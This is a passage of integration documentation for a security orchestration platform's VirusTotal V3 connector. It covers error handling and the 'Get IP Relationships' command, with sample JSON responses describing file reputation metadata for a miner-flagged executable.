'TIMESTAMP-SHA256-2019-10-15', 'algorithm': 'sha256RSA', 'valid from': '12:00 AM 10/01/2019', 'valid to': '12:00 AM 10/17/2030', 'serial number': '04 CD 3F 85 68 AE 76 C6 1B B0 FE 71 60 CC A7 6D', 'cert issuer': 'DigiCert SHA2 Assured ID Timestamping CA', 'thumbprint': '0325BD505EDA96302DC22F4FA01E4C28BE2834C5'}, {'status': 'Valid', 'valid usage': 'Timestamp Signing', 'name': 'DigiCert SHA2 Assured ID Timestamping CA', 'algorithm': 'sha256RSA', 'valid from': '12:00 PM 01/07/2016', 'valid to': '12:00 PM 01/07/2031', 'serial number': '0A A1 25 D6 D6 32 1B 7E 41 E4 05 DA 36 97 C2 15', 'cert issuer': 'DigiCert Assured ID Root CA', 'thumbprint': '3BA63A6E4841355772DEBEF9CDCF4D5AF353A297'}, {'status': 'Valid', 'valid usage': 'Client Auth, Code Signing, Email Protection, Server Auth, Timestamp Signing', 'name': 'DigiCert', 'algorithm': 'sha1RSA', 'valid from': '12:00 AM 11/10/2006', 'valid to': '12:00 AM 11/10/2031', 'serial number': '0C E7 E0 E5 17 D8 46 FE 8F E5 60 FC 1B F0 30 39', 'cert issuer': 'DigiCert Assured ID Root CA', 'thumbprint': '0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43'}], 'counter signers': 'TIMESTAMP-SHA256-2019-10-15; DigiCert SHA2 Assured ID Timestamping CA; DigiCert', 'copyright': 'Copyright (c) ESET, spol. s r.o. 1992-2020. All rights reserved.', 'signers details': [{'status': 'Valid', 'valid usage': 'Code Signing', 'name': 'ESET, spol. s r.o.', 'algorithm': 'sha256RSA', 'valid from': '12:00 AM 05/10/2019', 'valid to': '11:59 PM 05/22/2022', 'serial number': '65 62 8C 14 6A CE 93 03 7F C5 86 59 F1 4B D3 5F', 'cert issuer': 'Symantec Class 3 Extended Validation Code Signing CA - G2', 'thumbprint': 'B59165451BE46B8D72D09191D0961C755D0107C8'}, {'status': 'Valid', 'valid usage': 'Code Signing', 'name': 'Symantec Class 3 Extended Validation Code Signing CA - G2', 'algorithm': 'sha256RSA', 'valid from': '12:00 AM 03/04/2014', 'valid to': '11:59 PM 03/03/2024', 'serial number': '19 1A 32 CB 75 9C 97 B8 CF AC 11 8D D5 12 7F 49', 'cert issuer': 'VeriSign Class 3 Public Primary Certification Authority - G5', 'thumbprint': '5B8F88C80A73D35F76CD412A9E74E916594DFA67'}, {'status': 'Valid', 'valid usage': 'Client Auth, Code Signing, Email Protection, Server Auth', 'name': 'VeriSign', 'algorithm': 'sha1RSA', 'valid from': '12:00 AM 11/08/2006', 'valid to': '11:59 PM 07/16/2036', 'serial number': '18 DA D1 9E 26 7D E8 BB 4A 21 58 CD CC 6B 3B 4A', 'cert issuer': 'VeriSign Class 3 Public Primary Certification Authority - G5', 'thumbprint': '4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5'}], 'internal name': 'ekrn.exe'}, 'last_modification_date': 1625773228, 'type_tag': 'peexe', 'times_submitted': 14, 'total_votes': {'harmless': 0, 'malicious': 0}, 'size': 2595360, 'type_extension': 'exe', 'authentihash': '*****', 'last_submission_date': 1620603625, 'last_analysis_results': {'Bkav': {'category': 'failure', 'engine_name': 'Bkav', 'engine_version': '1.3.0.9899', 'result': None, 'method': 'blacklist', 'engine_update': '20210607'}, 'Elastic': {'category': 'undetected', 'engine_name': 'Elastic', 'engine_version': '4.0.22', 'result': None, 'method': 'blacklist', 'engine_update': '20210524'}, 'MicroWorld-eScan': {'category': 'undetected', 'engine_name': 'MicroWorld-eScan', 'engine_version': '14.0.409.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'CMC': {'category': 'undetected', 'engine_name': 'CMC', 'engine_version': '2.10.2019.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210506'}, 'CAT-QuickHeal': {'category': 'undetected', 'engine_name': 'CAT-QuickHeal', 'engine_version': '14.00', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'McAfee': {'category': 'undetected', 'engine_name': 'McAfee', 'engine_version': '6.0.6.653', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Cylance': {'category': 'undetected', 'engine_name': 'Cylance', 'engine_version': '2.3.1.101', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'VIPRE': {'category': 'undetected', 'engine_name': 'VIPRE', 'engine_version': '93040', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'AegisLab': {'category': 'undetected', 'engine_name': 'AegisLab', 'engine_version': '4.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210607'}, 'Sangfor': {'category': 'undetected', 'engine_name': 'Sangfor', 'engine_version': '2.9.0.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210416'}, 'K7AntiVirus': {'category': 'undetected', 'engine_name': 'K7AntiVirus', 'engine_version': '11.186.37351', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'BitDefender': {'category': 'undetected', 'engine_name': 'BitDefender', 'engine_version': '7.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'K7GW': {'category': 'undetected', 'engine_name': 'K7GW', 'engine_version': '11.186.37353', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Cybereason': {'category': 'undetected', 'engine_name': 'Cybereason', 'engine_version': '1.2.449', 'result': None, 'method': 'blacklist', 'engine_update': '20210330'}, 'Arcabit': {'category': 'undetected', 'engine_name': 'Arcabit', 'engine_version': '1.0.0.886', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Baidu': {'category': 'undetected', 'engine_name': 'Baidu', 'engine_version': '1.0.0.2', 'result': None, 'method': 'blacklist', 'engine_update': '20190318'}, 'Cyren': {'category': 'undetected', 'engine_name': 'Cyren', 'engine_version': '6.3.0.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'SymantecMobileInsight': {'category': 'type-unsupported', 'engine_name': 'SymantecMobileInsight', 'engine_version': '2.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210126'}, 'Symantec': {'category': 'undetected', 'engine_name': 'Symantec', 'engine_version': '1.14.0.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'ESET-NOD32': {'category': 'undetected', 'engine_name': 'ESET-NOD32', 'engine_version': '23406', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'APEX': {'category': 'undetected', 'engine_name': 'APEX', 'engine_version': '6.170', 'result': None, 'method': 'blacklist', 'engine_update': '20210601'}, 'Paloalto': {'category': 'undetected', 'engine_name': 'Paloalto', 'engine_version': '1.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'ClamAV': {'category': 'undetected', 'engine_name': 'ClamAV', 'engine_version': '0.103.2.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'Kaspersky': {'category': 'undetected', 'engine_name': 'Kaspersky', 'engine_version': '21.0.1.45', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Alibaba': {'category': 'undetected', 'engine_name': 'Alibaba', 'engine_version': '0.3.0.5', 'result': None, 'method': 'blacklist', 'engine_update': '20190527'}, 'NANO-Antivirus': {'category': 'undetected', 'engine_name': 'NANO-Antivirus', 'engine_version': '1.0.146.25311', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'ViRobot': {'category': 'undetected', 'engine_name': 'ViRobot', 'engine_version': '2014.3.20.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'Rising': {'category': 'undetected', 'engine_name': 'Rising', 'engine_version': '25.0.0.26', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Ad-Aware': {'category': 'undetected', 'engine_name': 'Ad-Aware', 'engine_version': '3.0.21.179', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Trustlook': {'category': 'type-unsupported', 'engine_name': 'Trustlook', 'engine_version': '1.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'TACHYON': {'category': 'undetected', 'engine_name': 'TACHYON', 'engine_version': '2021-06-04.01', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Emsisoft': {'category': 'undetected', 'engine_name': 'Emsisoft', 'engine_version': '2018.12.0.1641', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Comodo': {'category': 'undetected', 'engine_name': 'Comodo', 'engine_version': '33589', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'F-Secure': {'category': 'undetected', 'engine_name': 'F-Secure', 'engine_version': '12.0.86.52', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'DrWeb': {'category': 'undetected', 'engine_name': 'DrWeb', 'engine_version': '7.0.49.9080', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Zillya': {'category': 'undetected', 'engine_name': 'Zillya', 'engine_version': '2.0.0.4380', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'TrendMicro': {'category': 'undetected', 'engine_name': 'TrendMicro', 'engine_version': '11.0.0.1006', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'McAfee-GW-Edition': {'category': 'undetected', 'engine_name': 'McAfee-GW-Edition', 'engine_version': 'v2019.1.2+3728', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'Trapmine': {'category': 'type-unsupported', 'engine_name': 'Trapmine', 'engine_version': '3.5.0.1023', 'result': None, 'method': 'blacklist', 'engine_update': '20200727'}, 'FireEye': {'category': 'undetected', 'engine_name': 'FireEye', 'engine_version': '32.44.1.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Sophos': {'category': 'undetected', 'engine_name': 'Sophos', 'engine_version': '1.0.2.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Ikarus': {'category': 'undetected', 'engine_name': 'Ikarus', 'engine_version': '0.1.5.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'Avast-Mobile': {'category': 'type-unsupported', 'engine_name': 'Avast-Mobile', 'engine_version': '210603-00', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'Jiangmin': {'category': 'undetected', 'engine_name': 'Jiangmin', 'engine_version': '16.0.100', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'Webroot': {'category': 'undetected', 'engine_name': 'Webroot', 'engine_version': '1.0.0.403', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Avira': {'category': 'undetected', 'engine_name': 'Avira', 'engine_version': '8.3.3.12', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'eGambit': {'category': 'undetected', 'engine_name': 'eGambit', 'engine_version': None, 'result': None, 'method': 'blacklist', 'engine_update': '20210607'}, 'Antiy-AVL': {'category': 'undetected', 'engine_name': 'Antiy-AVL', 'engine_version': '3.0.0.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Kingsoft': {'category': 'undetected', 'engine_name': 'Kingsoft', 'engine_version': '2017.9.26.565', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Gridinsoft': {'category': 'undetected', 'engine_name': 'Gridinsoft', 'engine_version': '1.0.43.135', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Microsoft': {'category': 'undetected', 'engine_name': 'Microsoft', 'engine_version': '1.1.18200.4', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'SUPERAntiSpyware': {'category': 'undetected', 'engine_name': 'SUPERAntiSpyware', 'engine_version': '5.6.0.1032', 'result': None, 'method': 'blacklist', 'engine_update': '20210529'}, 'ZoneAlarm': {'category': 'undetected', 'engine_name': 'ZoneAlarm', 'engine_version': '1.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'GData': {'category': 'undetected', 'engine_name': 'GData', 'engine_version': 'A:25.29847B:27.23242', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Cynet': {'category': 'undetected', 'engine_name': 'Cynet', 'engine_version': '4.0.0.27', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'BitDefenderFalx': {'category': 'type-unsupported', 'engine_name': 'BitDefenderFalx', 'engine_version': '2.0.936', 'result': None, 'method': 'blacklist', 'engine_update': '20200916'}, 'AhnLab-V3': {'category': 'undetected', 'engine_name': 'AhnLab-V3', 'engine_version': '3.20.1.10133', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Acronis': {'category': 'undetected', 'engine_name': 'Acronis', 'engine_version': '1.1.1.82', 'result': None, 'method': 'blacklist', 'engine_update': '20210512'}, 'VBA32': {'category': 'undetected', 'engine_name': 'VBA32', 'engine_version': '5.0.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'ALYac': {'category': 'undetected', 'engine_name': 'ALYac', 'engine_version': '1.1.3.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'MAX': {'category': 'undetected', 'engine_name': 'MAX', 'engine_version': '2019.9.16.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Malwarebytes': {'category': 'undetected', 'engine_name': 'Malwarebytes', 'engine_version': '4.2.2.27', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Panda': {'category': 'undetected', 'engine_name': 'Panda', 'engine_version': '4.6.4.2', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'Zoner': {'category': 'undetected', 'engine_name': 'Zoner', 'engine_version': '0.0.0.0', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'TrendMicro-HouseCall': {'category': 'undetected', 'engine_name': 'TrendMicro-HouseCall', 'engine_version': '10.0.0.1040', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Tencent': {'category': 'undetected', 'engine_name': 'Tencent', 'engine_version': '1.0.0.1', 'result': None, 'method': 'blacklist', 'engine_update': '20210604'}, 'Yandex': {'category': 'undetected', 'engine_name': 'Yandex', 'engine_version': '5.5.2.24', 'result': None, 'method': 'blacklist', 'engine_update': '20210603'}, 'SentinelOne': {'category': 'undetected', 'engine_name': 'SentinelOne', 'engine_ver |
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get File Reports failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: File Hash Not Found. |
Error Sample Data Get File Reports failed. Status Code: 404. Message: File Hash Not Found. |
Get IP Relationships
Retrieves objects related to the specified IP addresses.
Input
Input Parameter | Required/Optional | Description | Example |
IPs | Required | The IPs to retrieve related objects. |
JSON
|
Relationship | Required | The relationship between the specified IPs and the related objects to return. Note: Relationship options labeled with “(Enterprise)” (e.g. Download_files (Enterprise)) can only be used with a premium VirusTotal API connection. | Communicating_files |
Output
The primary response data from the API request.
SAMPLE DATA
{
"meta": {
"count": 200,
"cursor": "STEwCi4="
},
"data": [
{
"attributes": {
"type_description": "Win32 EXE",
"tlsh": "*****",
"vhash": "*****\"z",
"trid": [
{
"file_type": "Win64 Executable (generic)",
"probability": 63.5
},
{
"file_type": "OS/2 Executable (generic)",
"probability": 12.2
},
{
"file_type": "Generic Win/DOS Executable",
"probability": 12
},
{
"file_type": "DOS Executable Generic",
"probability": 12
}
],
"signature_info": {
"description": " ",
"copyright": " ",
"internal name": "mine.exe",
"file version": "0.0.0.0",
"original name": "mine.exe"
},
"creation_date": 1625642073,
"names": [
"mine.exe"
],
"dot_net_guids": {
"typelib_id": "*****",
"mvid": "*****"
},
"last_modification_date": 1625859995,
"type_tag": "peexe",
"times_submitted": 1,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"size": 49664,
"popular_threat_classification": {
"suggested_threat_label": "trojan.msil/kryptik",
"popular_threat_category": [
{
"count": 5,
"value": "trojan"
},
{
"count": 3,
"value": "miner"
}
],
"popular_threat_name": [
{
"count": 4,
"value": "msil"
},
{
"count": 3,
"value": "kryptik"
},
{
"count": 2,
"value": "filerepmalware"
}
]
},
"authentihash": "*****",
"last_submission_date": 1625769633,
"meaningful_name": "mine.exe",
"sandbox_verdicts": {
"C2AE": {
"category": "malicious",
"confidence": 50,
"sandbox_name": "C2AE",
"malware_classification": [
"MALWARE"
],
"malware_names": [
"XMRminer",
"CryptoCurrencyMiner"
]
}
},
"sha256": "*****",
"type_extension": "exe",
"tags": [
"64bits",
"peexe",
"runtime-modules"
],
"last_analysis_date": 1625788864,
"unique_sources": 1,
"first_submission_date": 1625769633,
"sha1": "*****",
"ssdeep": "1536:*****:*****",
"packers": {
"PEiD": "Microsoft Visual C++ vx.x DLL"
},
"md5": "*****",
"dot_net_assembly": {
"assembly_name": "mine.exe",
"tables_rows_map_log": "464465444444",
"type_definition_list": [
{
"type_definitions": [
"Assembly",
"MethodInfo",
"MethodBase"
],
"namespace": "System.Reflection"
},
{
"type_definitions": [
"CompilationRelaxationsAttribute",
"RuntimeCompatibilityAttribute"
],
"namespace": "System.Runtime.CompilerServices"
},
{
"type_definitions": [
"Enumerable"
],
"namespace": "System.Linq"
},
{
"type_definitions": [
"Object",
"Int32",
"Type",
"Exception"
],
"namespace": "System"
},
{
"type_definitions": [
"GuidAttribute"
],
"namespace": "System.Runtime.InteropServices"
},
{
"type_definitions": [
"Thread"
],
"namespace": "System.Threading"
},
{
"type_definitions": [
"IEnumerable`1"
],
"namespace": "System.Collections.Generic"
},
{
"type_definitions": [
"ResourceManager"
],
"namespace": "System.Resources"
}
],
"external_assemblies": {
"mscorlib": {
"version": "4.0.0.0"
},
"System.Core": {
"version": "4.0.0.0"
}
},
"tables_rows_map": "1e20002000100300001000000000100001002000010020",
"manifest_resource": [
"nbikvldajisefzfcvbczilssaff.Resources"
],
"streams": {
"#~": {
"chi2": 35004.3046875,
"size": 424,
"entropy": 3.3833563327*****307,
"md5": "*****"
},
"#Strings": {
"chi2": 6834.89794921875,
"size": 552,
"entropy": 4.738160133361816,
"md5": "*****"
},
"#US": {
"chi2": 9998.591796875,
"size": 148,
"entropy": 3.312086582183838,
"md5": "*****"
},
"#GUID": {
"chi2": 240,
"size": 16,
"entropy": 4,
"md5": "*****"
},
"#Blob": {
"chi2": 2217.9609375,
"size": 204,
"entropy": 5.1748833656311035,
"md5": "*****"
}
},
"tables_present": 12,
"clr_version": "v4.0.30319",
"assembly_data": {
"majorversion": 0,
"minorversion": 0,
"hashalgid": 32772,
"flags_text": "afPA_None",
"buildnumber": 0,
"flags": 0,
"revisionnumber": 0,
"name": "mine"
},
"tables_present_map": "90908021447L",
"clr_meta_version": "1.1"
},
"pe_info": {
"resource_details": [
{
"lang": "NEUTRAL",
"entropy": 3.1186211109161377,
"chi2": 49802.72265625,
"filetype": "Data",
"sha256": "*****",
"type": "RT_VERSION"
},
{
"lang": "NEUTRAL",
"entropy": 5.00111722946167,
"chi2": 4719.86083984375,
"filetype": "Data",
"sha256": "*****",
"type": "RT_MANIFEST"
}
],
"resource_types": {
"RT_MANIFEST": 1,
"RT_VERSION": 1
},
"timestamp": 1625642073,
"resource_langs": {
"NEUTRAL": 2
},
"machine_type": 34404,
"sections": [
{
"name": ".text",
"chi2": 197889.53,
"virtual_address": 8192,
"entropy": 7.42,
"raw_size": 47616,
"flags": "rx",
"virtual_size": 47536,
"md5": "*****"
},
{
"name": ".rsrc",
"chi2": 102753.17,
"virtual_address": 57344,
"entropy": 3.67,
"raw_size": 1536,
"flags": "r",
"virtual_size": 1232,
"md5": "*****"
}
]
},
"magic": "PE32+ executable for MS Windows (GUI)",
"last_analysis_stats": {
"harmless": 0,
"type-unsupported": 5,
"suspicious": 0,
"confirmed-timeout": 1,
"timeout": 0,
"failure": 0,
"malicious": 22,
"undetected": 47
},
"last_analysis_results": {},
"reputation": 0
},
"type": "file",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/files/*****"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/domains/*****.*****.***/communicating_files?limit=10",
"next": "https://www.virustotal.com/api/v3/domains/*****.*****.***/communicating_files?cursor=STEwCi4%3D&limit=10"
}
}The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
{
"meta": {
"count": 200,
"cursor": "STEwCi4="
},
"data": [
{
"attributes": {
"type_description": "Win32 EXE",
"tlsh": "*****",
"vhash": "*****\"z",
"trid": [
{
"file_type": "Win64 Executable (generic)",
"probability": 63.5
},
{
"file_type": "OS/2 Executable (generic)",
"probability": 12.2
},
{
"file_type": "Generic Win/DOS Executable",
"probability": 12
},
{
"file_type": "DOS Executable Generic",
"probability": 12
}
],
"signature_info": {
"description": " ",
"copyright": " ",
"internal name": "mine.exe",
"file version": "0.0.0.0",
"original name": "mine.exe"
},
"creation_date": 1625642073,
"names": [
"mine.exe"
],
"dot_net_guids": {
"typelib_id": "*****",
"mvid": "*****"
},
"last_modification_date": 1625859995,
"type_tag": "peexe",
"times_submitted": 1,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"size": 49664,
"popular_threat_classification": {
"suggested_threat_label": "trojan.msil/kryptik",
"popular_threat_category": [
{
"count": 5,
"value": "trojan"
},
{
"count": 3,
"value": "miner"
}
],
"popular_threat_name": [
{
"count": 4,
"value": "msil"
},
{
"count": 3,
"value": "kryptik"
},
{
"count": 2,
"value": "filerepmalware"
}
]
},
"authentihash": "*****",
"last_submission_date": 1625769633,
"meaningful_name": "mine.exe",
"sandbox_verdicts": {
"C2AE": {
"category": "malicious",
"confidence": 50,
"sandbox_name": "C2AE",
"malware_classification": [
"MALWARE"
],
"malware_names": [
"XMRminer",
"CryptoCurrencyMiner"
]
}
},
"sha256": "*****",
"type_extension": "exe",
"tags": [
"64bits",
"peexe",
"runtime-modules"
],
"last_analysis_date": 1625788864,
"unique_sources": 1,
"first_submission_date": 1625769633,
"sha1": "*****",
"ssdeep": "1536:*****:*****",
"packers": {
"PEiD": "Microsoft Visual C++ vx.x DLL"
},
"md5": "*****",
"dot_net_assembly": {
"assembly_name": "mine.exe",
"tables_rows_map_log": "464465444444",
"type_definition_list": [
{
"type_definitions": [
"Assembly",
"MethodInfo",
"MethodBase"
],
"namespace": "System.Reflection"
},
{
"type_definitions": [
"CompilationRelaxationsAttribute",
"RuntimeCompatibilityAttribute"
],
"namespace": "System.Runtime.CompilerServices"
},
{
"type_definitions": [
"Enumerable"
],
"namespace": "System.Linq"
},
{
"type_definitions": [
"Object",
"Int32",
"Type",
"Exception"
],
"namespace": "System"
},
{
"type_definitions": [
"GuidAttribute"
],
"namespace": "System.Runtime.InteropServices"
},
{
"type_definitions": [
"Thread"
],
"namespace": "System.Threading"
},
{
"type_definitions": [
"IEnumerable`1"
],
"namespace": "System.Collections.Generic"
},
{
"type_definitions": [
"ResourceManager"
],
"namespace": "System.Resources"
}
],
"external_assemblies": {
"mscorlib": {
"version": "4.0.0.0"
},
"System.Core": {
"version": "4.0.0.0"
}
},
"tables_rows_map": "1e20002000100300001000000000100001002000010020",
"manifest_resource": [
"nbikvldajisefzfcvbczilssaff.Resources"
],
"streams": {
"#~": {
"chi2": 35004.3046875,
"size": 424,
"entropy": 3.3833563327*****307,
"md5": "*****"
},
"#Strings": {
"chi2": 6834.89794921875,
"size": 552,
"entropy": 4.738160133361816,
"md5": "*****"
},
"#US": {
"chi2": 9998.591796875,
"size": 148,
"entropy": 3.312086582183838,
"md5": "*****"
},
"#GUID": {
"chi2": 240,
"size": 16,
"entropy": 4,
"md5": "*****"
},
"#Blob": {
"chi2": 2217.9609375,
"size": 204,
"entropy": 5.1748833656311035,
"md5": "*****"
}
},
"tables_present": 12,
"clr_version": "v4.0.30319",
"assembly_data": {
"majorversion": 0,
"minorversion": 0,
"hashalgid": 32772,
"flags_text": "afPA_None",
"buildnumber": 0,
"flags": 0,
"revisionnumber": 0,
"name": "mine"
},
"tables_present_map": "90908021447L",
"clr_meta_version": "1.1"
},
"pe_info": {
"resource_details": [
{
"lang": "NEUTRAL",
"entropy": 3.1186211109161377,
"chi2": 49802.72265625,
"filetype": "Data",
"sha256": "*****",
"type": "RT_VERSION"
},
{
"lang": "NEUTRAL",
"entropy": 5.00111722946167,
"chi2": 4719.86083984375,
"filetype": "Data",
"sha256": "*****",
"type": "RT_MANIFEST"
}
],
"resource_types": {
"RT_MANIFEST": 1,
"RT_VERSION": 1
},
"timestamp": 1625642073,
"resource_langs": {
"NEUTRAL": 2
},
"machine_type": 34404,
"sections": [
{
"name": ".text",
"chi2": 197889.53,
"virtual_address": 8192,
"entropy": 7.42,
"raw_size": 47616,
"flags": "rx",
"virtual_size": 47536,
"md5": "*****"
},
{
"name": ".rsrc",
"chi2": 102753.17,
"virtual_address": 57344,
"entropy": 3.67,
"raw_size": 1536,
"flags": "r",
"virtual_size": 1232,
"md5": "*****"
}
]
},
"magic": "PE32+ executable for MS Windows (GUI)",
"last_analysis_stats": {
"harmless": 0,
"type-unsupported": 5,
"suspicious": 0,
"confirmed-timeout": 1,
"timeout": 0,
"failure": 0,
"malicious": 22,
"undetected": 47
},
"last_analysis_results": {},
"reputation": 0
},
"type": "file",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/files/*****"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/domains/*****.*****.***/communicating_files?limit=10",
"next": "https://www.virustotal.com/api/v3/domains/*****.*****.***/communicating_files?cursor=STEwCi4%3D&limit=10"
}
}Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"IPs": [
"***.***.***.***"
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
META | DATA | LINKS |
|---|---|---|
{'count': 200, 'cursor': 'STEwCi4=', 'ip': '***.***.***.***'} | [{'attributes': {'type_description': 'Win32 EXE', 'tlsh': '*****', 'vhash': '*****"z', 'trid': [{'file_type': 'Win64 Executable (generic)', 'probability': 63.5}, {'file_type': 'OS/2 Executable (generic)', 'probability': 12.2}, {'file_type': 'Generic Win/DOS Executable', 'probability': 12.0}, {'file_type': 'DOS Executable Generic', 'probability': 12.0}], 'signature_info': {'description': ' ', 'copyright': ' ', 'internal name': 'mine.exe', 'file version': '0.0.0.0', 'original name': 'mine.exe'}, 'creation_date': 1625642073, 'names': ['mine.exe'], 'dot_net_guids': {'typelib_id': '*****', 'mvid': '*****'}, 'last_modification_date': 1625859995, 'type_tag': 'peexe', 'times_submitted': 1, 'total_votes': {'harmless': 0, 'malicious': 0}, 'size': 49664, 'popular_threat_classification': {'suggested_threat_label': 'trojan.msil/kryptik', 'popular_threat_category': [{'count': 5, 'value': 'trojan'}, {'count': 3, 'value': 'miner'}], 'popular_threat_name': [{'count': 4, 'value': 'msil'}, {'count': 3, 'value': 'kryptik'}, {'count': 2, 'value': 'filerepmalware'}]}, 'authentihash': '*****', 'last_submission_date': 1625769633, 'meaningful_name': 'mine.exe', 'sandbox_verdicts': {'C2AE': {'category': 'malicious', 'confidence': 50, 'sandbox_name': 'C2AE', 'malware_classification': ['MALWARE'], 'malware_names': ['XMRminer', 'CryptoCurrencyMiner']}}, 'sha256': '*****', 'type_extension': 'exe', 'tags': ['64bits', 'peexe', 'runtime-modules'], 'last_analysis_date': 1625788864, 'unique_sources': 1, 'first_submission_date': 1625769633, 'sha1': '*****', 'ssdeep': '1536:*****:*****', 'packers': {'PEiD': 'Microsoft Visual C++ vx.x DLL'}, 'md5': '*****', 'dot_net_assembly': {'assembly_name': 'mine.exe', 'tables_rows_map_log': '464465444444', 'type_definition_list': [{'type_definitions': ['Assembly', 'MethodInfo', 'MethodBase'], 'namespace': 'System.Reflection'}, {'type_definitions': ['CompilationRelaxationsAttribute', 'RuntimeCompatibilityAttribute'], 'namespace': 'System.Runtime.CompilerServices'}, {'type_definitions': ['Enumerable'], 'namespace': 'System.Linq'}, {'type_definitions': ['Object', 'Int32', 'Type', 'Exception'], 'namespace': 'System'}, {'type_definitions': ['GuidAttribute'], 'namespace': 'System.Runtime.InteropServices'}, {'type_definitions': ['Thread'], 'namespace': 'System.Threading'}, {'type_definitions': ['IEnumerable`1'], 'namespace': 'System.Collections.Generic'}, {'type_definitions': ['ResourceManager'], 'namespace': 'System.Resources'}], 'external_assemblies': {'mscorlib': {'version': '4.0.0.0'}, 'System.Core': {'version': '4.0.0.0'}}, 'tables_rows_map': '1e20002000100300001000000000100001002000010020', 'manifest_resource': ['nbikvldajisefzfcvbczilssaff.Resources'], 'streams': {'#~': {'chi2': 35004.3046875, 'size': 424, 'entropy': 3.3833563327*****307, 'md5': '*****'}, '#Strings': {'chi2': 6834.89794921875, 'size': 552, 'entropy': 4.738160133361816, 'md5': '*****'}, '#US': {'chi2': 9998.591796875, 'size': 148, 'entropy': 3.312086582183838, 'md5': '*****'}, '#GUID': {'chi2': 240.0, 'size': 16, 'entropy': 4.0, 'md5': '*****'}, '#Blob': {'chi2': 